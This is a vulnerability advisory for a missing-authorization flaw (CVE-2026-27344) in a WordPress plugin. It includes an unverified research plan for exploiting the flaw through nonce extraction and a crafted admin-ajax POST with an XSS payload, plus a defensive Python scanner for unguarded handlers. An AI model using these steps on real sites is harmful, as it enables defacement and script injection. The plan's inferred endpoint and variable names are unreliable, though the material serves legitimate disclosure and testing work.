CVE-2026-27344

Scientific and Interactive Blocks – inseri core <= 1.0.5 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The Scientific and Interactive Blocks – inseri core plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.0.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions: <= 1.0.5
Published: February 25, 2026
Last updated: March 5, 2026
Affected plugin: inseri-core
Research Plan
Unverified


This research plan outlines the steps to identify and exploit the Missing Authorization vulnerability (CVE-2026-27344) in the Scientific and Interactive Blocks – inseri core plugin.


1. Vulnerability Summary

The Scientific and Interactive Blocks – inseri core plugin (up to version 1.0.5) fails to implement proper authorization checks (e.g., current_user_can()) on one or more of its AJAX or REST API handlers. Specifically, functions registered under wp_ajax_nopriv_* or REST routes with permissive permission_callback values allow unauthenticated attackers to perform actions intended for administrators or editors, such as creating, modifying, or deleting interactive blocks/items.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php (AJAX) or /wp-json/inseri-core/v1/... (REST API).
  • Vulnerable Action (Inferred): Likely an action related to "saving" or "updating" block data. Based on the plugin structure, candidate actions include inseri_core_save_item, inseri_core_create_item, or a REST route like POST /wp-json/inseri-core/v1/items.
  • Payload Parameters: item_id (int), content (string/JSON), and potentially a nonce.
  • Preconditions: The plugin must be active. If a nonce is required, a page containing an inseri block must be accessible to extract the nonce.

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=[ACTION_NAME].
  2. Hook Registration: The plugin registers the action:
    add_action( 'wp_ajax_nopriv_[ACTION_NAME]', 'handle_unauthorized_action' );
    (or fails to provide a permission_callback in a REST route).
  3. Vulnerable Function: The handler function handle_unauthorized_action executes.
  4. Authorization Failure: The function lacks a current_user_can('edit_posts') or current_user_can('manage_options') check.
  5. Sink: The function proceeds to call wp_update_post(), update_post_meta(), or a direct $wpdb query to modify site content.

4. Nonce Acquisition Strategy

If the handler uses check_ajax_referer or wp_verify_nonce, the nonce is likely localized for the frontend editor or interactive blocks.

  1. Identify Shortcode: Locate the primary shortcode (likely [inseri-item]) or the block registration in the source.
  2. Create Trigger Page: Use WP-CLI to create a page containing the block:
    wp post create --post_type=page --post_status=publish --post_title="Exploit Page" --post_content='<!-- wp:inseri-core/item {"id":1} /-->'
    
  3. Extract Nonce: Load the page in a browser and read the localized nonce from the JavaScript console.
    • Candidate JS Variables: window.inseri_core_vars?.nonce or window.inseri_core_data?.ajax_nonce.
    • Action String: Check the source for wp_create_nonce('...') to identify the correct action key.

5. Exploitation Strategy

This plan assumes the vulnerability allows unauthorized modification of an "inseri item" (a custom post type or meta entry).

Step 1: Discovery
Search the plugin directory to find the specific vulnerable action:

grep -rn "wp_ajax_nopriv" .
grep -rn "register_rest_route" . -A 5

Identify handlers that perform write operations (update, delete, save).
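The grep commands above only list hook registrations; the practitioner still has to follow each registration to its handler and decide whether a capability check sits on the path. The script below, an added example that is not code from inseri core or from this page, automates that triage for the patterns described in the code-flow section (section 3) and in this discovery step: it finds wp_ajax_nopriv_* registrations and register_rest_route() calls, resolves string callbacks to their function bodies, and reports every entry point reachable without a session whose path never calls current_user_can(). It runs against a constructed PHP plugin source embedded in the script; the plugin, its hook names (demo_save_item, demo_nonce_only, demo_delete_item, demo/v1 routes) and handler names are invented for the demonstration and are not inseri core identifiers. The sample also shows the unguarded handler beside its hardened form (demo_delete_item), and a nonce-only handler, which the scanner still flags because a nonce localized on a public page is a CSRF token rather than authorization.

```python
import re
from dataclasses import dataclass, field

# Constructed sample plugin source (hypothetical; NOT inseri core code). It holds
# the patterns the discovery step greps for: a nopriv AJAX handler with no
# capability check, one that checks only a nonce, one properly guarded, and REST
# routes with a permissive, a missing, and a real permission_callback.
SAMPLE_PLUGIN_PHP = r"""<?php
add_action( 'wp_ajax_nopriv_demo_save_item', 'demo_save_item' );
function demo_save_item() {
    wp_update_post( array( 'ID' => intval( $_POST['id'] ), 'post_content' => $_POST['content'] ) );
}
add_action( 'wp_ajax_nopriv_demo_nonce_only', 'demo_nonce_only' );
function demo_nonce_only() {
    check_ajax_referer( 'demo_nonce', 'nonce' );   // CSRF token only, not authorization
    update_post_meta( intval( $_POST['id'] ), 'demo_data', $_POST['content'] );
}
add_action( 'wp_ajax_nopriv_demo_delete_item', 'demo_delete_item' );
function demo_delete_item() {
    check_ajax_referer( 'demo_nonce', 'nonce' );
    if ( ! current_user_can( 'edit_posts' ) ) { wp_send_json_error( 'forbidden', 403 ); }
    wp_delete_post( intval( $_POST['id'] ), true );
}
add_action( 'rest_api_init', function () {
    register_rest_route( 'demo/v1', '/items', array(
        'methods' => 'POST', 'callback' => 'demo_rest_create',
        'permission_callback' => '__return_true',
    ) );
    register_rest_route( 'demo/v1', '/items/(?P<id>\d+)', array(
        'methods' => 'DELETE', 'callback' => 'demo_rest_delete',
    ) );
    register_rest_route( 'demo/v1', '/settings', array(
        'methods' => 'POST', 'callback' => 'demo_rest_settings',
        'permission_callback' => function () { return current_user_can( 'manage_options' ); },
    ) );
} );
"""

WRITE_SINKS = ("wp_update_post", "wp_insert_post", "wp_delete_post",
               "update_post_meta", "update_option", "$wpdb->")

@dataclass
class Finding:
    kind: str          # "ajax" or "rest"
    name: str          # AJAX action name or namespace+route
    public: bool       # reachable with no session (nopriv hook / ungated route)
    cap_check: bool    # current_user_can() seen on the handling path
    nonce_check: bool  # check_ajax_referer()/wp_verify_nonce() seen (CSRF only)
    sinks: list = field(default_factory=list)  # write sinks seen in the handler

def _balanced(src, start, open_ch, close_ch):
    """Text between src[start] (must be open_ch) and its matching close_ch."""
    depth = 0
    for i in range(start, len(src)):
        depth += (src[i] == open_ch) - (src[i] == close_ch)
        if depth == 0:
            return src[start + 1:i]
    raise ValueError("unbalanced " + open_ch + close_ch)

def function_body(src, name):
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    return _balanced(src, src.index("{", m.end()), "{", "}") if m else ""

def _finding(kind, name, public, path_src):
    return Finding(kind, name, public,
                   cap_check="current_user_can(" in path_src,
                   nonce_check="check_ajax_referer(" in path_src or "wp_verify_nonce(" in path_src,
                   sinks=[s for s in WRITE_SINKS if s in path_src])

def scan_ajax(src):
    # Only string callbacks are resolved; closures and array callbacks need manual review.
    hook = r"add_action\(\s*['\"]wp_ajax_nopriv_(\w+)['\"]\s*,\s*['\"](\w+)['\"]"
    return [_finding("ajax", m.group(1), True, function_body(src, m.group(2)))
            for m in re.finditer(hook, src)]

def scan_rest(src):
    out = []
    for m in re.finditer(r"register_rest_route\s*\(", src):
        args = _balanced(src, m.end() - 1, "(", ")")
        ns, path = re.match(r"\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]", args).groups()
        perm = re.search(r"['\"]permission_callback['\"]\s*=>\s*([^\n]+)", args)
        perm = perm.group(1).rstrip(", ") if perm else None
        # No permission_callback: WordPress >= 5.5 logs _doing_it_wrong but still serves the route.
        public = perm is None or perm.strip("'\"") == "__return_true"
        guard = "" if public else (perm if perm.startswith("function") else function_body(src, perm.strip("'\"")))
        cb = re.search(r"['\"]callback['\"]\s*=>\s*['\"](\w+)['\"]", args)
        body = function_body(src, cb.group(1)) if cb else ""
        out.append(_finding("rest", ns + path, public, guard + body))
    return out

def scan_plugin(src):
    return scan_ajax(src) + scan_rest(src)

def risky(findings):
    """Entry points reachable without login whose path never calls current_user_can()."""
    return [f for f in findings if f.public and not f.cap_check]

def reason(f):
    if f.nonce_check:
        return "nonce only: a nonce localized on a public page is a CSRF token, not authorization"
    return "no capability check" + (", writes via " + ", ".join(f.sinks) if f.sinks else "")

if __name__ == "__main__":
    for f in risky(scan_plugin(SAMPLE_PLUGIN_PHP)):
        print(f"[{f.kind}] {f.name}: {reason(f)}")
```

To run it against a real plugin, feed each PHP file's contents to scan_plugin() and review the risky() list. The checks are textual: a current_user_can() call anywhere in the handler counts as a guard even if it sits on an unrelated branch, closures and array callbacks registered on AJAX hooks are not resolved, and a nonce check is reported separately because it does not prove authorization. Treat the output as a triage list for manual review, not as a verdict.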

Step 2: Nonce Extraction (If Required)
If a nonce is found in the discovery step (e.g., check_ajax_referer( 'inseri_core_nonce' ... )):

  1. Navigate to the trigger page created in section 4 (Nonce Acquisition Strategy).
  2. In the browser console, evaluate window.inseri_core_vars.nonce (or whichever variable the plugin's source localizes).

Step 3: Execution of Unauthorized Action
Send a crafted HTTP request to modify a block's content:

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=[DISCOVERED_ACTION]&nonce=[EXTRACTED_NONCE]&id=[TARGET_ID]&content=<h1>Vulnerable</h1><script>alert(1)</script>
    

6. Test Data Setup

  1. Activate Plugin: wp plugin activate inseri-core.
  2. Create Target Content: If the plugin uses a custom post type for items, create one:
    wp post create --post_type=inseri_item --post_title="Target Block" --post_content="Original Scientific Data" --post_status=publish
    
  3. Identify Target ID: Note the ID of the created post (e.g., 123).

7. Expected Results

  • Response: The server returns a 200 OK or a JSON success message (e.g., {"success":true}).
  • Impact: The content of the "Scientific Block" (Post ID 123) is modified to include the attacker's payload (e.g., XSS or defacement).

8. Verification Steps

  1. Check Post Content: Use WP-CLI to verify the modification:
    wp post get [TARGET_ID] --field=post_content
    
  2. Verify UI Change: Navigate to the page where the block is embedded and check for the injected payload.

9. Alternative Approaches

  • REST API Route: If an AJAX handler isn't found, check for REST routes at POST /wp-json/inseri-core/v1/items. Test the permission_callback. If it returns __return_true or is missing, the route is publicly accessible.
  • Settings Modification: Check if the plugin registers wp_ajax_nopriv_inseri_core_save_settings. If so, try to change plugin-wide configurations or inject malicious scripts into global headers/footers if the plugin provides such features.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Scientific and Interactive Blocks – inseri core plugin for WordPress (up to version 1.0.5) fails to perform proper authorization checks in its AJAX or REST API handlers. This vulnerability allows unauthenticated attackers to perform sensitive actions, such as creating or modifying interactive blocks, by targeting functions registered without capability checks.

Exploit Outline

  1. Locate a vulnerable AJAX action (e.g., one associated with saving blocks) registered with wp_ajax_nopriv_*, or a REST API route (e.g., /wp-json/inseri-core/v1/items) lacking a strict permission_callback.
  2. If a security nonce is required, visit a page where an inseri block is active and extract the nonce from the localized JavaScript variables (e.g., window.inseri_core_vars.nonce).
  3. Send a POST request to the WordPress AJAX or REST endpoint containing the identified action, the security nonce, the target block ID, and a malicious payload in the content field.
  4. Verify that the block's content has been updated without authorization, or that a malicious script (XSS) is now embedded within the block.
